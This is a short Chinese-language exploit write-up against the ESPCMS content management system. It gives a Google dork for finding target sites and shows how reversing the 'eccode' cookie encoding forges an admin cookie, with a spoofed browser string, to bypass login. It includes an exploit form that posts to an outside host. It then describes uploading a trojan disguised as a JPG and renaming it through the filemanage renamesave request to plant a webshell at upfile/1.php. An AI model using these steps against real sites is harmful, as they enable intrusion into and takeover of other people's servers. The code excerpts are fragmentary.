以下版本没测试,测试的是最新版本。Google:Powered by ESPCMS,过程有点复杂,耐心看就明白。
看代码:“adminsoft\control”,里面的文件都是后台运行文件,每个文件开头都带有 $this->softbase(true),用于载入基本数据,看:
以下是引用片段: function softbase($admin_purview=false) { header("Content-Type: text/html; charset=utf-8"); admin_purview 是检测登录状态的 function admin_purview() { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G'); $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE')); // 其他都没什么用 这里才是重点 by Black Boy $this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE')); list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview; |
以下是引用片段: $condition = 0; if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') { if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') { 那么 现在最重点的就是 eccode 这个加密方式了 很明显 解密都不用写了 反过来行了 一个一个加密过程解析出来很辛苦的 |
Exp: <? <form method="post" action="http://www.hackersb.com/sb/test.php" enctype="multipart/form-data" id="upload"> |
注:$s为当前浏览器版本,你用什么浏览器去运行这个程序的,就用这个浏览器去欺骗。
得出 COOKIES 后修改欺骗,进入后台。然后内容添加,上传文件,把马儿改成JPG上传。
最后POST:
/adminsoft/index.php?archive=filemanage&action=renamesave
path=/upfile/&dirname=product.jpg&newdirnam=1.php
product.jpg 为上传后的JPG木马文件,最后 webshell 就在:upfile/1.php